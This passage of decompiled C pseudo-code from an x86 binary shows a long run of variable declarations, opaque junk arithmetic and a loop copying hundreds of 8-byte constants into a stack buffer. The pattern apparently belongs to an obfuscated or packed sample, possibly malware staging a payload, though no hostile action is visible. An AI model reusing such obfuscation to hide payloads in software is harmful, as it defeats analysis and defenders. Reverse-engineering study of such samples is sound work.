				long long _v5820;
				long long _v5828;
				long long _v5836;
				long long _v5844;
				long long _v5852;
				long long _v5860;
				long long _v5868;
				long long _v5876;
				long long _v5884;
				long long _v5892;
				long long _v5900;
				long long _v5908;
				long long _v5916;
				long long _v5924;
				long long _v5932;
				long long _v5940;
				long long _v5948;
				long long _v5956;
				long long _v5964;
				long long _v5972;
				long long _v5980;
				long long _v5988;
				long long _v5996;
				long long _v6004;
				long long _v6012;
				long long _v6020;
				long long _v6028;
				long long _v6036;
				long long _v6044;
				long long _v6052;
				long long _v6060;
				long long _v6068;
				long long _v6076;
				long long _v6084;
				long long _v6092;
				long long _v6100;
				long long _v6108;
				long long _v6116;
				long long _v6124;
				long long _v6132;
				long long _v6140;
				long long _v6148;
				long long _v6156;
				long long _v6164;
				long long _v6172;
				long long _v6180;
				long long _v6188;
				long long _v6196;
				long long _v6204;
				long long _v6212;
				long long _v6220;
				long long _v6228;
				long long _v6236;
				long long _v6244;
				long long _v6252;
				long long _v6260;
				long long _v6268;
				long long _v6276;
				long long _v6284;
				long long _v6292;
				long long _v6300;
				long long _v6308;
				long long _v6316;
				long long _v6324;
				long long _v6332;
				long long _v6340;
				long long _v6348;
				long long _v6356;
				long long _v6364;
				long long _v6372;
				long long _v6380;
				long long _v6388;
				long long _v6396;
				long long _v6404;
				long long _v6412;
				long long _v6420;
				long long _v6428;
				long long _v6436;
				long long _v6444;
				long long _v6452;
				long long _v6460;
				long long _v6468;
				long long _v6476;
				long long _v6484;
				long long _v6492;
				long long _v6500;
				long long _v6508;
				long long _v6516;
				long long _v6524;
				long long _v6532;
				long long _v6540;
				long long _v6548;
				long long _v6556;
				long long _v6564;
				long long _v6572;
				long long _v6580;
				long long _v6588;
				long long _v6596;
				long long _v6604;
				long long _v6612;
				long long _v6620;
				long long _v6628;
				long long _v6636;
				long long _v6644;
				long long _v6652;
				long long _v6660;
				long long _v6668;
				long long _v6676;
				long long _v6684;
				long long _v6692;
				long long _v6700;
				long long _v6708;
				long long _v6716;
				long long _v6724;
				long long _v6732;
				long long _v6740;
				long long _v6748;
				long long _v6756;
				long long _v6764;
				long long _v6772;
				long long _v6780;
				long long _v6788;
				long long _v6796;
				long long _v6804;
				long long _v6812;
				long long _v6820;
				long long _v6828;
				long long _v6836;
				long long _v6844;
				long long _v6852;
				long long _v6860;
				long long _v6868;
				long long _v6876;
				long long _v6884;
				long long _v6892;
				long long _v6900;
				long long _v6908;
				long long _v6916;
				long long _v6924;
				long long _v6932;
				long long _v6940;
				long long _v6948;
				long long _v6956;
				long long _v6964;
				long long _v6972;
				long long _v6980;
				long long _v6988;
				long long _v6996;
				long long _v7004;
				long long _v7012;
				long long _v7020;
				long long _v7028;
				long long _v7036;
				long long _v7044;
				long long _v7052;
				long long _v7060;
				long long _v7068;
				long long _v7076;
				long long _v7084;
				long long _v7092;
				long long _v7100;
				long long _v7108;
				long long _v7116;
				long long _v7124;
				long long _v7132;
				long long _v7140;
				long long _v7148;
				long long _v7156;
				long long _v7164;
				long long _v7172;
				long long _v7180;
				long long _v7188;
				long long _v7196;
				long long _v7204;
				long long _v7212;
				long long _v7220;
				long long _v7228;
				long long _v7236;
				long long _v7244;
				long long _v7252;
				long long _v7260;
				long long _v7268;
				long long _v7276;
				long long _v7284;
				long long _v7292;
				long long _v7300;
				long long _v7308;
				long long _v7316;
				long long _v7324;
				long long _v7332;
				long long _v7340;
				long long _v7348;
				long long _v7356;
				long long _v7364;
				long long _v7372;
				long long _v7380;
				long long _v7388;
				long long _v7396;
				long long _v7404;
				long long _v7412;
				long long _v7420;
				long long _v7428;
				long long _v7436;
				long long _v7444;
				long long _v7452;
				long long _v7460;
				long long _v7468;
				long long _v7476;
				long long _v7484;
				long long _v7492;
				long long _v7500;
				long long _v7508;
				long long _v7516;
				long long _v7524;
				long long _v7532;
				long long _v7540;
				long long _v7548;
				long long _v7556;
				long long _v7564;
				long long _v7572;
				long long _v7580;
				long long _v7588;
				long long _v7596;
				long long _v7604;
				long long _v7612;
				long long _v7620;
				long long _v7628;
				long long _v7636;
				long long _v7644;
				long long _v7652;
				long long _v7660;
				long long _v7668;
				long long _v7676;
				long long _v7684;
				long long _v7692;
				long long _v7700;
				long long _v7708;
				long long _v7716;
				long long _v7724;
				long long _v7732;
				long long _v7740;
				long long _v7748;
				long long _v7756;
				long long _v7764;
				long long _v7772;
				long long _v7780;
				long long _v7788;
				long long _v7796;
				long long _v7804;
				long long _v7812;
				long long _v7820;
				long long _v7828;
				long long _v7836;
				long long _v7844;
				long long _v7852;
				long long _v7860;
				long long _v7868;
				long long _v7876;
				long long _v7884;
				long long _v7892;
				long long _v7900;
				long long _v7908;
				long long _v7916;
				long long _v7924;
				long long _v7932;
				long long _v7940;
				long long _v7948;
				long long _v7956;
				long long _v7964;
				long long _v7972;
				long long _v7980;
				long long _v7988;
				long long _v7996;
				long long _v8004;
				long long _v8012;
				long long _v8020;
				long long _v8028;
				long long _v8036;
				long long _v8044;
				long long _v8052;
				long long _v8060;
				long long _v8068;
				long long _v8076;
				long long _v8084;
				long long _v8092;
				long long _v8100;
				long long _v8108;
				long long _v8116;
				long long _v8124;
				long long _v8132;
				long long _v8140;
				long long _v8148;
				long long _v8156;
				long long _v8164;
				long long _v8172;
				long long _v8180;
				long long _v8188;
				long long _v8196;
				long long _v8204;
				long long _v8212;
				long long _v8220;
				long long _v8228;
				long long _v8236;
				long long _v8244;
				long long _v8252;
				long long _v8260;
				long long _v8268;
				long long _v8276;
				long long _v8284;
				signed int _v8288;
				intOrPtr _t1541;
				intOrPtr _t1560;
				signed int _t1565;
				intOrPtr _t1570;
				intOrPtr _t1581;
				signed int _t1630;
				intOrPtr _t1653;
				intOrPtr _t1666;
				intOrPtr _t1668;
				signed int _t1685;
				intOrPtr _t1695;
				signed int _t1712;
				intOrPtr _t1731;
				intOrPtr _t1751;
				intOrPtr _t1763;
				signed int _t1857;
				intOrPtr _t1862;
				intOrPtr _t1880;
				intOrPtr _t1903;
				intOrPtr _t1999;
				signed int _t2019;
				intOrPtr _t2022;
				intOrPtr _t2037;
				intOrPtr _t2044;
				intOrPtr _t2050;
				void* _t2072;
				long long _t2402;
				long long _t2478;
				long long _t2483;
				long long _t2579;
				long long _t2700;
				long long _t2765;
				long long _t2802;
				long long _t2860;

				E0040C690(0x205c);
				_v52 = 0x11;
				_v132 = 0x1b;
				_v172 = 1;
				_v288 = 0xa;
				_v6 = 0x1f;
				_v193 = 0x11;
				_v164 = 0x22;
				_v192 = 0xe;
				_v224 = 0x21;
				_v124 = 0x20;
				_v41 = 9;
				_v104 = 0x11;
				_t1541 =  *0x436058; // 0x39
				_v228 = _t1541 + 0x00000049 |  *0x436044;
				_v140 = _v200 - _v68;
				_v128 = _v68 - _v292 + 0x5c - _v244;
				_v164 = _v165 & 0x000000ff ^ _v144 ^ _v212 -  *0x42c00c;
				_v26 = _v244 - _v144 + _v200 + _v204 - _v212;
				_v237 = _v180 - 0x25 - _v204 - 0x4d;
				_v236 = _v36 - (_v24 & 0x0000ffff) - _v140;
				_v204 = _v109 & 0x000000ff ^ _v212;
				_t1712 = _v204;
				_t1903 =  *0x42c014; // 0x536cedcb
				_t43 = _t1712 - 0x3f; // 0x536ced8c
				_v181 = _t1903 + _t43;
				_v280 = _v264 - _v200 & 0x0000003f;
				_v6 = _v264 - (_v32 & 0x0000ffff) | 0x00000020;
				_t2072 = _v140 -  *0x42d03c; // 0x0
				if(_t2072 >= 0) {
					_v133 = (_v181 & 0x000000ff) + 0x5f - (_v224 & 0x0000ffff) - _v212;
					_t59 = _v36 - 0x8f; // -126
					_v301 = (_v52 & 0x0000ffff) + _t59 ^ _v88;
				}
				_v166 = _v212 + 0x00000059 & _v268 - 0x00000042 & _v156;
				_v98 = 0xf4;
				_v133 = _v7 & 0x000000ff | 0x00000018 & _v204;
				_v104 = _v104 & 0x0000ffff | (_v7 & 0x000000ff) - (_v181 & 0x000000ff);
				_v26 = _v280 -  *0x42d03c - 0xe - _v316 + _v204;
				_v252 = 0x907;
				_t1560 =  *0x43604c; // 0x0
				_v200 = _t1560 - _v268;
				_v164 = _v180 + 0x4e - (_v164 & 0x0000ffff) - _v156;
				_v26 = (_v25 & 0x000000ff) + 0x0000009c ^ _v36 + 0x0000005c;
				_t1565 = _v5 & 0x000000ff;
				_t1731 =  *0x42d034; // 0x0
				_t91 = _t1565 + 0x11; // 0x11
				_v181 = _v312 + 0x00000013 & _t1731 + _t91;
				_v156 = (_v193 & 0x000000ff) - _v312;
				_v80 = _v140 + (_v301 & 0x000000ff) - 0x32;
				_v164 = _v264 + 0x00000059 | 0x000000c0;
				_v273 = 0x35;
				_v188 = _v156 + _v36 + 0x19;
				_v52 = _v212 - (_v288 & 0x0000ffff) & _v144 & _v144;
				_v7 = (_v104 & 0x0000ffff) + 0x5e;
				_v180 = 0x31;
				_t1570 =  *0x42d030; // 0x0
				_v52 = _v268 + _t1570 - 0x00000052 | _v180;
				_v36 = (_v164 & 0x0000ffff) + 0x13;
				_v237 = _v316 + (_v52 & 0x0000ffff) + 0xa9;
				_v280 = 0x13 - _v140 - (_v193 & 0x000000ff);
				 *0x42c004 = (_v25 & 0x000000ff) + (_v301 & 0x000000ff);
				_v188 = _v88 + 0x00000055 & _v20;
				_v264 = E0040BFD0(_v140, _v88, _v204);
				_v193 = _v212 & _v144 ^ (_v145 & 0x000000ff) + (_v24 & 0x0000ffff) & 0x00000017;
				_v16 = 0xbf;
				_t1581 =  *0x42c018; // 0x5f
				_v236 = _t1581 - 0x00000061 | 0x00000043;
				_v8288 = _v316;
				if(_v8288 == 0) {
					_t1751 =  *0x42c010; // 0x48
					 *0x42c010 = _t1751 - (_v109 & 0x000000ff) + (_v6 & 0x000000ff);
					if(_v200 != 0x21) {
						_v52 = _v68 - 0x00000041 | _v200 + _v56;
						_v176 = _v156 +  *0x42c00c | 0x00000045;
					} else {
						_v204 = _v268 - 0x52;
						_t1695 =  *0x42d030; // 0x0
						_v108 = _t1695 - _v144 - (_v288 & 0x0000ffff);
					}
					 *0x42c028 = (_v164 & 0x0000ffff) + 0x3d;
				} else {
					if(_v8288 == 1) {
						if(_v192 < (_v181 & 0x000000ff)) {
							_v264 = _v156 & 0x00000049;
							_t1880 =  *0x436048; // 0x0
							_v156 = _t1880 - _v308;
						} else {
							_v237 = _v204 + 0x00000008 - _v144 - _v212 & _v68;
							_v7 = _v88 - _v212 - _v68 - 2;
						}
						_v193 = _v208;
					} else {
						if(_v8288 == 2) {
							 *0x42c008 = _v6 & 0x000000ff;
							_v166 = (_v166 & 0x000000ff) + (_v188 & 0x0000ffff) - 0x46 - _v244;
						} else {
							_v180 = 0x4e - _v244;
						}
					}
				}
				_v109 = (_v193 & 0x000000ff) + (_v52 & 0x0000ffff) - _v312 - _v180 + _v140;
				_v96 = 0x42a248;
				_v108 = _v140 + 0x61 - _v244;
				_v132 = _v68 + 0x00000039 ^ 0x0000007c;
				_v40 = 0x1dd;
				_v212 = _v312 - _v200;
				_t1763 =  *0x43604c; // 0x0
				_t211 = (_v6 & 0x000000ff) - 0x47; // -71
				_v164 = _t1763 - (_v5 & 0x000000ff) + _t211;
				_v188 = (_v188 & 0x0000ffff) + (_v41 & 0x000000ff);
				_v244 = _v156 | 0x0000000b;
				_v212 = _v244 - _v244;
				_v237 = _v12 +  *0x42c010 - _v264 + _v268 & 0x00000040;
				_v272 = _v96;
				_v301 = 0x5a - _v156 + _v76 - 0xb;
				_v88 = _v165 & 0x000000ff | 0x00000017;
				_v181 = (_v32 & 0x0000ffff) - (_v237 & 0x000000ff);
				_v284 = (_v5 & 0x000000ff) + _v204 | 0x00000008;
				_v237 = (_v132 & 0x0000ffff) + _v312 - _v264 - _v88 + _v264;
				_v180 = E0040BBD0(_v204, _v88, _v212);
				_v165 = _v264 - (_v7 & 0x000000ff) - _v180 + 0x00000014 ^ _v104 & 0x0000ffff;
				_v60 = 0;
				_v6 = _v76 - _v88 - _v140 + (_v260 & 0x0000ffff) + 8;
				_v156 = 0x18;
				_v26 = _v26 & 0x000000ff ^ (_v109 & 0x000000ff) + 0x0000000f - _v180 | _v140;
				_v200 = _v244 - _v308;
				_v5 = _v68 + _v140 + _v264 + _v144 + 0xa;
				_v36 = 0x28 - (_v133 & 0x000000ff);
				_v32 = _v144 + _v228 - _v312 + 0xf;
				_v56 = _v88 + _v108;
				_v124 = _v124 + (_v288 & 0x0000ffff) - 4;
				_t297 = _v144 - 0x41; // -41
				_v166 = (_v284 & 0x0000ffff) + 0x3f - _v156 + _t297;
				_v6 = _v36 - _v244 & _v212 - _v56 - _v244;
				_v244 = _v316 | 0x0000004d;
				if(_v244 < _v244) {
					_v217 = _v20 - _v144 - 0x00000048 & _v204 + 0x0000003d;
					_v24 = _v200 + _v312 + _v88 - 0x2b;
				} else {
					_v41 = 0x48 - _v68 + 0x12 - _v292 - (_v25 & 0x000000ff);
					_v200 = _v268 + _v64;
				}
				_v80 = (_v25 & 0x000000ff) + 0x0000000d & _v180;
				_v160 = 0x8296cbee;
				_v316 = (_v208 & 0x0000ffff) - 4;
				 *0x42c024 = (_v164 & 0x0000ffff ^ _v133 & 0x000000ff) &  *0x42c024;
				_v140 = (_v166 & 0x000000ff) + _v312;
				do {
					_v188 = _v180 - _v144 + _v180 + (_v288 & 0x0000ffff);
					_v236 = (_v7 & 0x000000ff) + _v144 - 0x57;
					_v104 = (_v24 & 0x0000ffff) + _v204 - _v316 & _v56;
					_v212 = 0xfffffff5;
					_v192 = _v56 + _v212 | 0x0000000b;
					_v6 = _v124 - _v88 | _v264 - (_v237 & 0x000000ff) - _v144;
					_v188 = _v88 - 0x89;
					_t1630 =  *0x42c008; // 0xd9
					_v236 = _v12 + _t1630 - 0x29;
					_v236 = 0x4c - (_v301 & 0x000000ff);
					_v300 = _v60;
					_v181 = 0x1d - _v244 + _v316 - (_v7 & 0x000000ff) + _v156;
					_v144 = _v204 + 0x16;
					_t382 = (_v208 & 0x0000ffff) + 0x2f; // 0xd1
					_v5 = 0xa2 - (_v301 & 0x000000ff) + _t382;
					_v237 = _v140 - _v264 + 0x00000031 & _v268;
					_t1999 =  *0x42d03c; // 0x0
					_v145 = _t1999 - _v144 - _v180 - (_v165 & 0x000000ff) + 0x35;
					_t395 = _v268 + 0x47; // 0x5f
					_v64 = _v156 + _t395;
					_v292 = (_v193 & 0x000000ff) + _v308 +  *0x42c008;
					_v216 = _v300 + 1;
					 *0x42c028 = _v88;
					_v228 = _v316 - 0x0000005f ^ _v244;
					_v48 = (_v145 & 0x000000ff) - _v264 + (_v133 & 0x000000ff) & _v48;
					_v312 = _v88 + 0x4c;
					_v12 = _v212 & 0x0000002c | _v244;
					_v124 = 0xf -  *0x436050 + 0x37;
					_v133 = _v280 + _v64 + 0x0000006f | 0x00000061;
					_v260 = (_v165 & 0x000000ff) - 0x0000002e & _v80 & _v68;
					_v92 = _v216 - _v273;
					_v5 = (_v132 & 0x0000ffff) - (_v32 & 0x0000ffff) + 0x00000012 ^ _v312 - _v88;
					if(_v268 <= 0x3a) {
						_v264 = (_v84 & 0x0000ffff) + 0x31;
						_v308 = _v76 + _v264 - 0x1b;
					}
					_v109 = _v312 +  *0x42d034 + _v212 - 3 + _v88;
					_v324 = 0x2a0;
					_t2019 = _v133 & 0x000000ff;
					_t1653 =  *0x42c000; // 0x12
					_t451 = _t2019 - 8; // 0xa
					_v181 = (_v181 & 0x000000ff) - (_t1653 + _t451 ^ _v316);
					_v172 = 0x0000001d - _v36 ^ 0x5c;
					_t2022 =  *0x42c010; // 0x48
					_v284 = _v284 & 0x0000ffff | (_v32 & 0x0000ffff) - _v316 & _t2022 + _v244;
					_v320 = 0x180;
					_v124 = (_v25 & 0x000000ff) + _v156 | 0x00000041;
					_v116 = _v273 * _v216 * _v92;
					_v6 = _v80 - (_v132 & 0x0000ffff) + _v156 + 0xa7;
					_v124 = _v68 - (_v165 & 0x000000ff) ^ _v133 & 0x000000ff;
					_v32 = _v284;
					_v124 = 0x42 - (_v32 & 0x0000ffff) - _v200;
					_v208 = _v208 & 0x0000ffff ^ (_v312 + 0x00000019 | 0x00000043);
					_t1666 =  *0x42c014; // 0x536cedcb
					_v288 = _t1666 - 0x8f;
					_v8284 =  *0x417a10;
					_v8276 =  *0x417a08;
					_v8268 =  *0x417a00;
					_v8260 =  *0x4179f8;
					_v8252 =  *0x4179f0;
					_v8244 =  *0x4179e8;
					_v8236 =  *0x4179e0;
					_v8228 =  *0x4179d8;
					_v8220 =  *0x4179d0;
					_v8212 =  *0x4179f8;
					_v8204 =  *0x4179c8;
					_v8196 =  *0x4179c0;
					_v8188 =  *0x4179f8;
					_v8180 =  *0x4179b8;
					_v8172 =  *0x4179b0;
					_v8164 =  *0x4179a8;
					_v8156 =  *0x4179a0;
					_v8148 =  *0x417998;
					_v8140 =  *0x417990;
					_v8132 =  *0x417988;
					_v8124 =  *0x417980;
					_v8116 =  *0x417978;
					_v8108 =  *0x417970;
					_v8100 =  *0x417968;
					_v8092 =  *0x417960;
					_v8084 =  *0x417958;
					_v8076 =  *0x417950;
					_v8068 =  *0x417948;
					_v8060 =  *0x417940;
					_v8052 =  *0x417938;
					_v8044 =  *0x417930;
					_v8036 =  *0x417928;
					_v8028 =  *0x417920;
					_v8020 =  *0x417918;
					_v8012 =  *0x417910;
					_v8004 =  *0x4179d8;
					_v7996 =  *0x417908;
					_v7988 =  *0x417900;
					_v7980 =  *0x4178f8;
					_v7972 =  *0x417940;
					_v7964 =  *0x4178f0;
					_v7956 =  *0x4178e8;
					_v7948 =  *0x4178e0;
					_v7940 =  *0x4178d8;
					_v7932 =  *0x4178d0;
					_v7924 =  *0x4178c8;
					_v7916 =  *0x4178c0;
					_v7908 =  *0x4178b8;
					_v7900 =  *0x417938;
					_v7892 =  *0x4178b0;
					_v7884 =  *0x4178b0;
					_v7876 =  *0x4178a8;
					_v7868 =  *0x4178a0;
					_v7860 =  *0x417898;
					_v7852 =  *0x417890;
					_v7844 =  *0x417888;
					_v7836 =  *0x417880;
					_v7828 =  *0x417878;
					_v7820 =  *0x417870;
					_v7812 =  *0x4179b8;
					_v7804 =  *0x417868;
					_v7796 =  *0x417860;
					_v7788 =  *0x417868;
					_v7780 =  *0x417858;
					_v7772 =  *0x417850;
					_v7764 =  *0x417848;
					_v7756 =  *0x417840;
					_v7748 =  *0x417838;
					_v7740 =  *0x417830;
					_v7732 =  *0x417828;
					_v7724 =  *0x417820;
					_v7716 =  *0x417818;
					_v7708 =  *0x417810;
					_v7700 =  *0x417808;
					_v7692 =  *0x417820;
					_v7684 =  *0x417800;
					_v7676 =  *0x417858;
					_v7668 =  *0x4177f8;
					_v7660 =  *0x4177f0;
					_v7652 =  *0x4177f0;
					_v7644 =  *0x4177e8;
					_v7636 =  *0x4177e0;
					_v7628 =  *0x4177d8;
					_v7620 =  *0x4177d0;
					_v7612 =  *0x4178e8;
					_v7604 =  *0x4177e8;
					_v7596 =  *0x4177c8;
					_v7588 =  *0x4177c0;
					_v7580 =  *0x417900;
					_v7572 =  *0x417900;
					_v7564 =  *0x4177b8;
					_v7556 =  *0x4177b0;
					_v7548 =  *0x4178f8;
					_v7540 =  *0x4177a8;
					_v7532 =  *0x417928;
					_v7524 =  *0x4177a0;
					_v7516 =  *0x417798;
					_v7508 =  *0x417790;
					_v7500 =  *0x417858;
					_v7492 =  *0x417788;
					_v7484 =  *0x417788;
					_v7476 =  *0x417780;
					_v7468 =  *0x417778;
					_v7460 =  *0x4179b0;
					_v7452 =  *0x4179a0;
					_v7444 =  *0x417770;
					_v7436 =  *0x417768;
					_v7428 =  *0x417998;
					_v7420 =  *0x4177d8;
					_v7412 =  *0x417760;
					_v7404 =  *0x417758;
					_v7396 =  *0x417820;
					_v7388 =  *0x417860;
					_v7380 =  *0x4177d0;
					_v7372 =  *0x417968;
					_v7364 =  *0x417750;
					_v7356 =  *0x417748;
					_v7348 =  *0x417740;
					_v7340 =  *0x417738;
					_v7332 =  *0x417908;
					_v7324 =  *0x417730;
					_v7316 =  *0x417728;
					_v7308 =  *0x417720;
					_v7300 =  *0x417718;
					_v7292 =  *0x417900;
					_v7284 =  *0x417710;
					_v7276 =  *0x417780;
					_v7268 =  *0x417708;
					_v7260 =  *0x417780;
					_v7252 =  *0x4179c8;
					_v7244 =  *0x417700;
					_v7236 =  *0x4176f8;
					_v7228 =  *0x4177a0;
					_v7220 =  *0x417a08;
					_v7212 =  *0x4176f0;
					_v7204 =  *0x4176e8;
					_v7196 =  *0x4177e0;
					_v7188 =  *0x4176e0;
					_v7180 =  *0x4179b0;
					_v7172 =  *0x4176d8;
					_v7164 =  *0x4176d0;
					_v7156 =  *0x4176c8;
					_v7148 =  *0x4176c0;
					_v7140 =  *0x417820;
					_v7132 =  *0x4176f0;
					_v7124 =  *0x4176b8;
					_v7116 =  *0x4176b0;
					_v7108 =  *0x4177d0;
					_v7100 =  *0x4176a8;
					_v7092 =  *0x417738;
					_v7084 =  *0x417950;
					_v7076 =  *0x4177d8;
					_v7068 =  *0x4179b0;
					_v7060 =  *0x4176a0;
					_v7052 =  *0x4176e8;
					_v7044 =  *0x417770;
					_v7036 =  *0x4179d0;
					_v7028 =  *0x417698;
					_v7020 =  *0x417690;
					_v7012 =  *0x417760;
					_v7004 =  *0x417688;
					_v6996 =  *0x417680;
					_v6988 =  *0x417678;
					_v6980 =  *0x417670;
					_v6972 =  *0x417668;
					_v6964 =  *0x417660;
					_v6956 =  *0x417898;
					_v6948 =  *0x417658;
					_v6940 =  *0x417650;
					_v6932 =  *0x417880;
					_v6924 =  *0x417828;
					_v6916 =  *0x417978;
					_v6908 =  *0x417648;
					_v6900 =  *0x417640;
					_v6892 =  *0x417638;
					_v6884 =  *0x417630;
					_v6876 =  *0x4178d0;
					_v6868 =  *0x417638;
					_v6860 =  *0x4179e8;
					_v6852 =  *0x4177c0;
					_v6844 =  *0x417628;
					_v6836 =  *0x4176c8;
					_v6828 =  *0x4178e0;
					_v6820 =  *0x417620;
					_v6812 =  *0x417920;
					_v6804 =  *0x4178c8;
					_v6796 =  *0x417618;
					_v6788 =  *0x4176b8;
					_v6780 =  *0x417610;
					_v6772 =  *0x417608;
					_v6764 =  *0x417600;
					_v6756 =  *0x4175f8;
					_v6748 =  *0x4175f0;
					_v6740 =  *0x417750;
					_v6732 =  *0x417628;
					_v6724 =  *0x4175e8;
					_v6716 =  *0x4176d8;
					_v6708 =  *0x417628;
					_v6700 =  *0x417638;
					_v6692 =  *0x417818;
					_v6684 =  *0x417858;
					_v6676 =  *0x4175e0;
					_v6668 =  *0x417660;
					_v6660 =  *0x4175d8;
					_v6652 =  *0x417658;
					_v6644 =  *0x417810;
					_v6636 =  *0x4175d0;
					_v6628 =  *0x4175c8;
					_v6620 =  *0x417828;
					_v6612 =  *0x417778;
					_v6604 =  *0x4175e0;
					_v6596 =  *0x4177c8;
					_v6588 =  *0x417910;
					_v6580 =  *0x4176b0;
					_v6572 =  *0x4175c0;
					_v6564 =  *0x4175b8;
					_v6556 =  *0x4175b0;
					_v6548 =  *0x4175a8;
					_v6540 =  *0x417740;
					_v6532 =  *0x417728;
					_v6524 =  *0x417938;
					_v6516 =  *0x4175a0;
					_v6508 =  *0x4176f8;
					_v6500 =  *0x417778;
					_v6492 =  *0x417598;
					_v6484 =  *0x4176e8;
					_v6476 =  *0x4179c8;
					_v6468 =  *0x4176e0;
					_v6460 =  *0x417908;
					_v6452 =  *0x417928;
					_v6444 =  *0x417590;
					_v6436 =  *0x417908;
					_v6428 =  *0x417928;
					_v6420 =  *0x417a08;
					_v6412 =  *0x417988;
					_v6404 =  *0x417880;
					_v6396 =  *0x417588;
					_v6388 =  *0x417580;
					_v6380 =  *0x417640;
					_v6372 =  *0x417858;
					_v6364 =  *0x417580;
					_v6356 =  *0x417810;
					_v6348 =  *0x417578;
					_v6340 =  *0x4177e0;
					_v6332 =  *0x417938;
					_v6324 =  *0x4176b8;
					_v6316 =  *0x4177e0;
					_v6308 =  *0x417938;
					_v6300 =  *0x4178e0;
					_v6292 =  *0x4179f8;
					_v6284 =  *0x4178a8;
					_v6276 =  *0x4178e0;
					_v6268 =  *0x4175c0;
					_v6260 =  *0x417570;
					_v6252 =  *0x417568;
					_v6244 =  *0x417560;
					_v6236 =  *0x417558;
					_v6228 =  *0x4178d8;
					_v6220 =  *0x417550;
					_v6212 =  *0x417580;
					_v6204 =  *0x417548;
					_v6196 =  *0x4179a8;
					_v6188 =  *0x417820;
					_v6180 =  *0x417540;
					_v6172 =  *0x417538;
					_v6164 =  *0x417970;
					_v6156 =  *0x417530;
					_v6148 =  *0x417850;
					_v6140 =  *0x417528;
					_v6132 =  *0x4179c0;
					_v6124 =  *0x417520;
					_v6116 =  *0x4178c8;
					_v6108 =  *0x417898;
					_v6100 =  *0x417748;
					_v6092 =  *0x417518;
					_v6084 =  *0x417510;
					_v6076 =  *0x417578;
					_v6068 =  *0x417508;
					_v6060 =  *0x417500;
					_v6052 =  *0x4175d0;
					_v6044 =  *0x417538;
					_v6036 =  *0x4174f8;
					_v6028 =  *0x417840;
					_v6020 =  *0x417760;
					_v6012 =  *0x417870;
					_v6004 =  *0x4179a0;
					_v5996 =  *0x417978;
					_v5988 =  *0x417640;
					_v5980 =  *0x417918;
					_v5972 =  *0x417830;
					_v5964 =  *0x4174f0;
					_v5956 =  *0x417880;
					_v5948 =  *0x417528;
					_v5940 =  *0x417848;
					_v5932 =  *0x4174e8;
					_v5924 =  *0x417760;
					_v5916 =  *0x417840;
					_v5908 =  *0x417a00;
					_v5900 =  *0x417860;
					_v5892 =  *0x4175b8;
					_v5884 =  *0x4174e0;
					_v5876 =  *0x4176f0;
					_v5868 =  *0x4174d8;
					_v5860 =  *0x417960;
					_v5852 =  *0x4174d0;
					_v5844 =  *0x4174c8;
					_v5836 =  *0x417740;
					_v5828 =  *0x417808;
					_v5820 =  *0x4174c0;
					_v5812 =  *0x4174b8;
					_v5804 =  *0x417508;
					_v5796 =  *0x417938;
					_v5788 =  *0x4175d8;
					_v5780 =  *0x4174b0;
					_v5772 =  *0x4175a8;
					_v5764 =  *0x417568;
					_t2402 =  *0x4177b0;
					_v5756 = _t2402;
					asm("fld1");
					_v5748 = _t2402;
					_v5740 =  *0x4174a8;
					_v5732 =  *0x4174a0;
					_v5724 =  *0x417540;
					_v5716 =  *0x417828;
					_v5708 =  *0x4178d8;
					_v5700 =  *0x417830;
					_v5692 =  *0x417498;
					_v5684 =  *0x417598;
					_v5676 =  *0x417490;
					_v5668 =  *0x417940;
					_v5660 =  *0x417778;
					_v5652 =  *0x417608;
					_v5644 =  *0x417488;
					_v5636 =  *0x417480;
					_v5628 =  *0x4176f8;
					_v5620 =  *0x417478;
					_v5612 =  *0x417470;
					_v5604 =  *0x417928;
					_v5596 =  *0x417490;
					_v5588 =  *0x4175c0;
					_v5580 =  *0x417660;
					_v5572 =  *0x417898;
					_v5564 =  *0x417828;
					_v5556 =  *0x417468;
					_v5548 =  *0x4176d8;
					_v5540 =  *0x4177f8;
					_v5532 =  *0x417460;
					_v5524 =  *0x417458;
					_v5516 =  *0x4177f0;
					_v5508 =  *0x4175e8;
					_v5500 =  *0x4179d8;
					_v5492 =  *0x4176b0;
					_v5484 =  *0x417900;
					_v5476 =  *0x417638;
					_v5468 =  *0x417538;
					_v5460 =  *0x417450;
					_v5452 =  *0x4179c0;
					_v5444 =  *0x417448;
					_v5436 =  *0x417440;
					_v5428 =  *0x417640;
					_v5420 =  *0x417640;
					_v5412 =  *0x417918;
					_v5404 =  *0x4175f8;
					_v5396 =  *0x417438;
					_v5388 =  *0x417430;
					_v5380 =  *0x417878;
					_v5372 =  *0x417750;
					_v5364 =  *0x417428;
					_v5356 =  *0x417808;
					_v5348 =  *0x417868;
					_v5340 =  *0x417500;
					_v5332 =  *0x417458;
					_v5324 =  *0x417420;
					_v5316 =  *0x417688;
					_v5308 =  *0x4179c8;
					_v5300 =  *0x417850;
					_v5292 =  *0x417548;
					_v5284 =  *0x417458;
					_v5276 =  *0x417748;
					_v5268 =  *0x417418;
					_v5260 =  *0x4176a0;
					_v5252 =  *0x417820;
					_v5244 =  *0x4177c0;
					_v5236 =  *0x417910;
					_v5228 =  *0x417410;
					_v5220 =  *0x4177a0;
					_v5212 =  *0x417480;
					_v5204 =  *0x417768;
					_v5196 =  *0x417740;
					_v5188 =  *0x4175d8;
					_v5180 =  *0x417408;
					_v5172 =  *0x417400;
					_v5164 =  *0x417718;
					_v5156 =  *0x4173f8;
					_v5148 =  *0x4173f0;
					_t2478 =  *0x4175f8;
					_v5140 = _t2478;
					asm("fld1");
					_v5132 = _t2478;
					_v5124 =  *0x4177e8;
					_v5116 =  *0x417468;
					_v5108 =  *0x417510;
					_v5100 =  *0x417718;
					_t2483 =  *0x417478;
					_v5092 = _t2483;
					asm("fld1");
					_v5084 = _t2483;
					_v5076 =  *0x417770;
					_v5068 =  *0x417988;
					_v5060 =  *0x417730;
					_v5052 =  *0x417500;
					_v5044 =  *0x4178c8;
					_v5036 =  *0x4179b8;
					_v5028 =  *0x417508;
					_v5020 =  *0x4173e8;
					_v5012 =  *0x4173e0;
					_v5004 =  *0x417468;
					_v4996 =  *0x417858;
					_v4988 =  *0x4175f0;
					_v4980 =  *0x417970;
					_v4972 =  *0x417878;
					_v4964 =  *0x417490;
					_v4956 =  *0x417858;
					_v4948 =  *0x4175f0;
					_v4940 =  *0x4173d8;
					_v4932 =  *0x4174e8;
					_v4924 =  *0x4175d8;
					_v4916 =  *0x417710;
					_v4908 =  *0x417658;
					_v4900 =  *0x4173d0;
					_v4892 =  *0x4173c8;
					_v4884 =  *0x4178d0;
					_v4876 =  *0x4178b8;
					_v4868 =  *0x4176d0;
